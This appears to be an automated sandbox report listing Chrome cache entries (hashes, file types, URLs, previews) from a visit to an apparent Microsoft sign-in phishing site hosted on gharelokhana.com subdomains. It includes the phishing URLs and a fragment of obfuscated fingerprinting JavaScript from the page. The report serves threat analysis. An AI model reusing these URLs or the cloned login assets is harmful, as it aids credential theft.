                                                SHA-512:426D65297BFAEDD04B0352717A0EE39332FC8C4B5679C4F0D8BE376F7B751D905064148642B9925E166C01207F231EDD13219699E08F7B3EAA06F4AB5AFF8DB1
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js
                                                Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....pk2..&..4..[a:....I..0...F:....7?o..s..L.....!..v..x.;~+..3.o.T.......B........R......7.|..u...Ax.7 .b..v..v.m-...~v...:....r..._......v.,...A.......:..z.>.y..u.....N...^..S.......z~@..;...n...K........x..A]....F.8X&Em..P.s.....a.g.|.d......._..C`.xQ...\..'..QP....?.R.{?....|.>........E4.GRz...z.k.z.}....h..>.{[E.:.....Wu. ..e6_.o..*.w...>...:.....k~...~..&E._..}}.}%[. ..#......z.5M.b.....z....H.4...l..D.o...z..M.+../..`....?y.J4.=....u.....Z.....E.d.....{0H^...8.....9..h.......dE...&.0Dv.....u.^.</.y...

                                                Chrome Cache Entry: 78

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 450007
                                                Category:downloaded
                                                Size (bytes):122366
                                                Entropy (8bit):7.997923806945064
                                                Encrypted:true
                                                SSDEEP:3072:rEaqX0++A6EIRMBphCs3NXMj689V37l9jjQ:rE5rJpsSNXMjjHs
                                                MD5:FC12BF558E8E5B38F1202817189EF8DC
                                                SHA1:0A1BD9EFA66FEFEC6F9562029FECB378F1C02613
                                                SHA-256:2EAC5A0BEB05086390FD44AA6DE16C3783638EAB62B04E821F8D8D633AED8B82
                                                SHA-512:1D081CE26EC978C9B78083FD2B91069BB4445AF735E4F96F26248198A3B633130AE997CE616A431D71CAED230BF2C945EEBC703DFC56CE5130A40313BB63EB59
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/ConvergedLogin_PCore_i5YupurhQAo9inu_OetqHw2.js
                                                Preview:...........{W.8.....{_&.L:.....t...C.g...,.V......;.|._UI.....u...G.K.W.T.*.J.~...J?.v..?..u..48)].>.:*]..?K...............4.|V..#;fn).JaT..'.fad',.M.....8....fQ.'s...{q..F...Ke..rK.v...N/+U..Am.......^..CR...sX..\... f.y....9..s..8.'..9.{.F.9...Kv.J1KJ.0J.x?..!B.Zcj....8t..s..1.....z!vq6.Ac.0._.J'....>......E..x...x.....g.A...Ts.Y.]..R..Q...c.K.e....Z.Dv.(.......)........Mg....^bq..f......U%..J..aP..........vkF.g=$.,6?|.x..|T.<.........N?..|..1..y.....1.\.....g.qf.r>.......Ku*NsSq).b.S!..`..b9.8....\+........Ye!...r._aT~.a&tO...v.G...c..;...~.1..,.$....N....N..p.U...0y.......@..eU. ...{..m....v..y.P..h........H..KQ.....,.........no.0.}G...T..o..+..R..Z,u.Z.fm...!D4x.w..U"......@..*.}*ma....@..-C...b.......>&..........U..'...G^.....E.......7...)..h.[..(..b.$.....=..!.8..y.:K.. ...k...C..G.F!.^L....G>.*...J..G.9..X7*..@L.L...h-.p..%R?.>e.......=....@O..*....w/.....2....5..T.......R........hY...~T...Z.....s.c..\|.zmO..)+k..Up.)#

                                                Chrome Cache Entry: 79

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:GIF image data, version 89a, 352 x 3
                                                Category:downloaded
                                                Size (bytes):2672
                                                Entropy (8bit):6.640973516071413
                                                Encrypted:false
                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..

                                                Chrome Cache Entry: 80

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 3566
                                                Category:downloaded
                                                Size (bytes):1434
                                                Entropy (8bit):7.865462103480691
                                                Encrypted:false
                                                SSDEEP:24:X8tDKwrcrPs3S+cm8K/soSJfMRuIeVodeC6XApuYeyITcVlJeMYbZHmWksLOnQ7X:X8tAPr1K0oufMR3eaAveurYVlsMYbBmy
                                                MD5:C9A3E03BFCE1D17E948FFF5530FA0D9D
                                                SHA1:62630846B2B10949CD9424AEE503A5DBFAFE79E6
                                                SHA-256:1F45EFED95A2F67DFF741C2DCC828077B13797DF5F0754CF41CA895D392265F7
                                                SHA-512:3941EA1A3801A9F922D6C27FCEFB8AA76D2F32BFC85B3AC754B160B5A0B3F09BBC413762E855E5AD829F86B9EA722B58E5A3148D541D8729129BE7581F77AC3D
                                                Malicious:false
                                                Reputation:low
                                                URL:https://l1ve.gharelokhana.com/Me.htm?v=3
                                                Preview:...........W.o.6.~._a.E ..".NR.a...P.M[T...j.#Q6...H.m.....e.[.>.!.|.;~...|eb-r;..rN.._..g.e..=.2....[..c..Tig......pl.&.....].C:gpm...x'R.,d.5..-....J[3+..Z......$.$S,.I0.Y.j..e.#..D..c.R...-..n..'...)7.....!......%b*ZM.8M.aD......\...\....@.,...6..^./P.g......k 7Y6.....".$Q.f.uc...wM.....;...E ..L...]..UUu5.3.s...O....S......z.S.;..9}......y...B&..;..[..5.[c..K.%.....GQV.....-5ImK"....A...Me.]i.&...KH.Em....''..9..uB.Dj...P...V.h.n...s....T9.../.r...{..#.+i...YLwF,.\.ek...y..!"L..<..`..E.v..b7...2...G..n....`B.F..p1.HB..=..]eW\.bf..2....h6;.#W..XL"._....A.+...m.~T.....m....&.E.z}...N.nR.......(..)u.'.w~`.m..:..0.E.k[..|.,.'...[....D=.......'P...`.....cb..?..F..]..f....L...X..ON..0...v.....u+pN.V..2.i.ZfE|..P...8l.?.r....A7...xUj_.z.F...._..5..s:.Nx..............'J..I..._.....=<.R.4.Y.......P..k#.=4.......8.R.W.....U]~._..:..m.C.`D6..7..XD...:..fmE.Rp.cH..$.ywX..SfT.Z.JE............J7.....t.t_..t..>M:"G....x.W7.p...Ap~P%...2....#..

                                                Chrome Cache Entry: 81

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:downloaded
                                                Size (bytes):28
                                                Entropy (8bit):4.307354922057605
                                                Encrypted:false
                                                SSDEEP:3:8Kiun9ks:8Kiun2s
                                                MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                Malicious:false
                                                Reputation:low
                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmwynrEGq4LLxIFDdFbUVISBQ1Xevf9?alt=proto
                                                Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=

                                                Chrome Cache Entry: 82

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, original size modulo 2^32 1864
                                                Category:downloaded
                                                Size (bytes):673
                                                Entropy (8bit):7.6584200238076905
                                                Encrypted:false
                                                SSDEEP:12:XRt8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:X+UVpkNK0Rwid81p6btk7LqZ6D
                                                MD5:2D2CBA7D7DC75F3BA9DC756738D41A6E
                                                SHA1:F87FD26066ED5E52A65DEE0ED2D581D3C3EA15AC
                                                SHA-256:00E21864CF1BC70302EBB5B496C6C471A7DA8CBF600630B478A3E2376ED20EA2
                                                SHA-512:46F17658CA247C02F612213025350390D8F62179C8DE26725EB17F5CCFAFDD63F2149DA1765D3C2F3A12FE85EF29CAC58457B0D5C2F8DA8DED6E1231A35F199D
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

                                                Chrome Cache Entry: 83

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, original size modulo 2^32 1592
                                                Category:downloaded
                                                Size (bytes):621
                                                Entropy (8bit):7.6770058072183405
                                                Encrypted:false
                                                SSDEEP:12:XDQ7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:X86qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                MD5:ECC8894D3791BEDDB4E0226F8DAB065A
                                                SHA1:6510EB51E76A49746C526E432455549B50DE5AF1
                                                SHA-256:64C8C0A9EFBC27AD86EAEC90465B75C52AE8CD68F7E76FC9431DC6AE66072AC3
                                                SHA-512:02B20BE98C22EBF7886FE68008C4ED42E3F8FF6ADC8DD7BC1A43A8C4F6FD56CC932EFC5500249A4FAA5024574A841AD10FC8DDB8221CB7226E0E16DEA63F7052
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...

                                                Chrome Cache Entry: 84

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 190271
                                                Category:dropped
                                                Size (bytes):61138
                                                Entropy (8bit):7.995267337866975
                                                Encrypted:true
                                                SSDEEP:1536:C95cuiwA5/0Ss7eVBChPEzXesY3OOUIC6/sRCuU/:C9muil8CVBy4XespZq
                                                MD5:52EE53F1EE9062DF8AE8D9CAE6E21C59
                                                SHA1:5A53A748231B4BBCB6953E7D3DB7BF9C89FE5135
                                                SHA-256:47377AC8F1BC6772D885B1838E675C38BEFE8334AEAAB3396B398C32BFE60E5B
                                                SHA-512:7CA19C5CA65951657D7FBF1AF3508EAF13E163709541C3BB59DB9AEFE578BD7A03C8B3DC5CA9D610484120537A8FBBD1BAA9F4C05CB55D3826E117E3F2DCBA78
                                                Malicious:false
                                                Reputation:low
                                                Preview:...........{[.H.8....F..VZ..$.....p..p[.sY.....Jl.#......U.w]...y....K..{uuuu]..8....M.....-.......4..K.><..{..<..gg......W.$*.4q._..w..s..,.....3....=r...9...OP..*.w..b.%.............Dw..a...ey.c.....r....e7l..<2..f.a....".N...c.E..5..E_..A.Gl4L..%.d..yx.M.tU.w..XV...:..y.!.4..a.. ..1..',..md.9>.......>4..."....!....].gP........u...:.rA_".Z.q;...V...r....8L.69...F.6.m.#.8...&.....j..Z.v..:I.".v...,..'...Y..-{(XvE....Z.]65_.U5J...0*..'6.5.{a5B.....o.9.....r!......0..u....-+S.1.q.d>=..&....+.Yz+.jh.E_n.,9I.....".......\.|.9...~./..,.S.wWq...}gA..'...<..g..........Z..\~aQ.z.l.-.....xf..E.F..v.6..=.=6..4... .?...~....1r.._>......5..I.a.?......q....?HF..lh$.a....6.I.O. ....5...X.[Y.6....dYZO....y..Or..zSB..e...l......o.rS..H...K..O.A.L.D...<.U..i.G6.^8k...G.]40m..m....m....C.b+.]?.2m....g?.m.4..kV..El.0KV_lN...exth.;+..j...n..r./6..I6/.M...T}...:..ow[9l.MX...-.i....a.)..[.09S .K).G.e.i?..=...h.9.0.5..GV...~.........u......n..]k-^..e._6.../.e

                                                Chrome Cache Entry: 85

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, original size modulo 2^32 3651
                                                Category:downloaded
                                                Size (bytes):1435
                                                Entropy (8bit):7.860223690068481
                                                Encrypted:false
                                                SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                                MD5:DF6A7721C242813411CC6950DF40F9B3
                                                SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                                SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                                SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

                                                Chrome Cache Entry: 86

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65454)
                                                Category:dropped
                                                Size (bytes):199223
                                                Entropy (8bit):5.870083379745591
                                                Encrypted:false
                                                SSDEEP:3072:piaaJ2sWVqKd8qK8tRzmNDaUqNUrqBAueuDp8a:QaLNYKK8t1tFUm2ueTa
                                                MD5:6B70CCEB5A29C45196C743082DE9A174
                                                SHA1:35D4CDD396FC9445E1334E91B792C661A6DDD628
                                                SHA-256:CD1908E341656ADD80F5E0010AC59EEF8770F883B5314B264CC55AA89C76E50D
                                                SHA-512:CC88B2994BEB9399BE3B60481708830C8CEE5592BA4A93EDFEAAC1ACBD4CDACE87A936148406F38802B8E130B8EEA387E151B02FE9A091C44FE7C42899D953F2
                                                Malicious:false
                                                Reputation:low
                                                Preview:<!DOCTYPE html>.<html lang="en">. <head>. <script type="text/javascript">. function a0T5(T,B){var k=a0T4();return a0T5=function(H,p){H=H-0x1ba;var f=k[H];return f;},a0T5(T,B);}function a0T4(){var aj=['esUmJ','unhandledRejection','emit','navigator','domain','cookietest=1;\x20SameSite=Strict;\x20expires=Thu,\x2001-Jan-1970\x2000:00:01\x20GMT','Symbol','charAt','\x20is\x20not\x20iterable','MohTE','closePath','cHSVO','process','cssText','enter','type','acosh','default','SGAfv','clientHeight','UCXGd','','frequency','IYEoB','supports','toLocaleString','zaUTW','WebKitMediaKeys','resolve','(max-monochrome:\x20','RegExp','6','sessionStorage','suffixes','done','Cwm\x20fjordbank\x20gly\x20','10244008DQectR','Too\x20high\x20value','.ezmob-footer','Gill\x20Sans','noUfn','VtcIS','gRWaa','CYUPz','rgba(102,\x20204,\x200,\x200.2)','UBKQc','precision','817029qpAUvs','TGeSU','Null','InvalidAccessError','Qolts','msLaunchUri','4uxGCFX','facade','setProperty','','pISpi','kArwB','-apple-system-body','RTCE

                                                Chrome Cache Entry: 87

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 15768
                                                Category:downloaded
                                                Size (bytes):5538
                                                Entropy (8bit):7.960199579905109
                                                Encrypted:false
                                                SSDEEP:96:whCVXNOo3nAv0SIPouFHQ4uQxsZ51rT18Ps8RLTJZctq5/+XVGbN6o91UwSuaGwg:NdOa8APoAQusbT1v8RtutveNR/aGJ
                                                MD5:D63B348D234F84AA9D51C5EDE29E2B6E
                                                SHA1:AF30AFBFC6DC69C80B42637E7B5A149F58F80071
                                                SHA-256:E552737337424A3E33E655698E3D7DF6DFDAD588A44BE35E3723AC5FF694F881
                                                SHA-512:2B3C92D4B4E106AD8E16F96DC46E9C368F41B2311A641E9510CB842E84037EEB87C2F6FEC74B84B6CE29C94F9427289D4F61057AAAB93B525206A8D437336F94
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js
                                                Preview:...........[}w.F...?.b.(..c.i....8zI..k..f...$F.1.. ........$!..=.13w..s./>.w........u{g.=...u.....>h./{.F..xhS..7.6....9p...(.D..a..Q.\hS.L|7.FI4.....$....._.X4.At..@.x...s.seZ.....!V..x..'..F.?..z.[..Ppm.z<..'.p.]..$..(..>...6.3..o.47..6..t...AfX..F.($8...= ...'..GDb<.iM..s.D....N..F.<.e.......M....t ...Sk.'wDb.h...M2K...... ..6N.X.o..s...S.....r.`......1..4.c...J....V....ED.7.........p......&i....p....O.. ....k......+p..-N....|..E...q.v5.....M]?.7.*_Eg.*...U.._.(RYZ.._U!]9..q..D..bwx....;.c.............g.....h...X.g!....s..."<.M..qd2..oM.f...I.F.=.-..7.9.9...'.n.@.X..+.4.R.M.y.y..',.lg.z...k.fA...B.@..,..;.'9.Z.....!.b..,_..17L.:.R.4.........yL\,..g.tr...A.p$n....S..q..E.......P.#.....pvE.d.....F...x...,`c.V...,~....">....%yu..h'.i..>.g.Nj.I.._.u.{..!..]...F...1.aP4..6./.$8..m..K...D.m.q....$.......XSb6k..+......9.....=?...5.e.?.`.wjp.QQjC6..<...=..CJ7`.A.d....1O....._..0..)....v.d......anSc.i..z..8NR.7N.N..{...q..,yBV;2

                                                Chrome Cache Entry: 88

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, original size modulo 2^32 1592
                                                Category:dropped
                                                Size (bytes):621
                                                Entropy (8bit):7.6770058072183405
                                                Encrypted:false
                                                SSDEEP:12:XDQ7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:X86qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                MD5:ECC8894D3791BEDDB4E0226F8DAB065A
                                                SHA1:6510EB51E76A49746C526E432455549B50DE5AF1
                                                SHA-256:64C8C0A9EFBC27AD86EAEC90465B75C52AE8CD68F7E76FC9431DC6AE66072AC3
                                                SHA-512:02B20BE98C22EBF7886FE68008C4ED42E3F8FF6ADC8DD7BC1A43A8C4F6FD56CC932EFC5500249A4FAA5024574A841AD10FC8DDB8221CB7226E0E16DEA63F7052
                                                Malicious:false
                                                Reputation:low
                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...

                                                Chrome Cache Entry: 89

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 57510
                                                Category:downloaded
                                                Size (bytes):16345
                                                Entropy (8bit):7.98961401355024
                                                Encrypted:false
                                                SSDEEP:384:gOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:gOBKJBXO586QB+11J
                                                MD5:1BB2645B377E0429225D33E4E2CC6E3F
                                                SHA1:A40797795C77CDFF574080B506BAB17DB38494B5
                                                SHA-256:B3B869875C7655F97500FBA0BCE74BCE7CC1DEE31D7CE5B93EA5D6457E07F08E
                                                SHA-512:49C98F20572C7488FEDB8AAF6C3D1D004904536524B79FA44CAABC5B91C8BA1A192B10F1FBE28112CC324E17600160E5BAA5E30261E5D63858C16376219DD3FE
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........

                                                Chrome Cache Entry: 90

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 407099
                                                Category:downloaded
                                                Size (bytes):116432
                                                Entropy (8bit):7.997416934471204
                                                Encrypted:true
                                                SSDEEP:3072:jLxCVzaxkqTE02dG4iro3WSLScw5y+jgJlusHPg6e:HgzaxkqTEPG4iUm/cws+jslJve
                                                MD5:46DAE7DFD4096049551CD0E8DD023B01
                                                SHA1:2C7ABF3A8897F95F5226E7F85BEC650C1D11E858
                                                SHA-256:AD3F589B62ADD96BDF1CA9B119C7A751E243014BF95F36A7C5C73A4833F241CB
                                                SHA-512:9798D7D7C46CFF811B816B6083D1CC0847F99B272A9B7FDB4A10BADB4729B311E785D6BCC73F2687005D48B02DDCEEA0C51B377078E4E57DC5C820712984269D
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js
                                                Preview:...........k[.H.(.}..[..-..c.0DFxHBz.I......O.a...#yt......k...J..&...........^.~...._..j...W;.8<.....]....m...~.}<.8~s.~=.(....qm.Oy.~....jaP......h.F^......|oZ.G.M-...,...a..~..GW|...L....N.(y...Z-..Cm......p.......?.5/.QmS..b^K...jw..8.}..Q.....!.o..8...&X.x-.Im.F.D..U;.....-.T.:...1........8Ka..M.L.ZZ'....>........x....v.S;.<...0J.I.0.G.....B.F..c.k.~....C.:...r..,.w.q~....q......#42V.q..f|.kK...1o.mP.}.......N..n.w6.%^M.d.;...~2I.Z....i.m..^k..l...z..0..7..h..'.7.....b..iz....o<?P...Kq\X.S..'...........o..Q...._...`k..7..W...[.l>..X.Y.O....;.".....`..X..r..C...0."...j.........>..-....R...6<...j.J...[.I...M..{..FSw.]..Q/i...3..y{.-..a...h.Eo..cc...O...)~..$...r-m..n......O.......f=..'q+..%L.'......fVW.bQ[.>&^t.O..I.LU....a....&.k.$...;..M...Y~...',.ox.&...f.2...o.L]..9....Ln-...i.+.X.|?..........d.#3.`.l.,'..E..b..Z@....@..|....2D1..,.....bZ....Co.N....^...6x..[....e..A+.......|...5...d...K.....W.|........6.....K.:..x9..s9P.-..!.G..0\

                                                Chrome Cache Entry: 91

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):315
                                                Entropy (8bit):5.0572271090563765
                                                Encrypted:false
                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                Malicious:false
                                                Reputation:low
                                                URL:https://alvoradavisual.com.br/favicon.ico
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

                                                Chrome Cache Entry: 92

                                                Download File
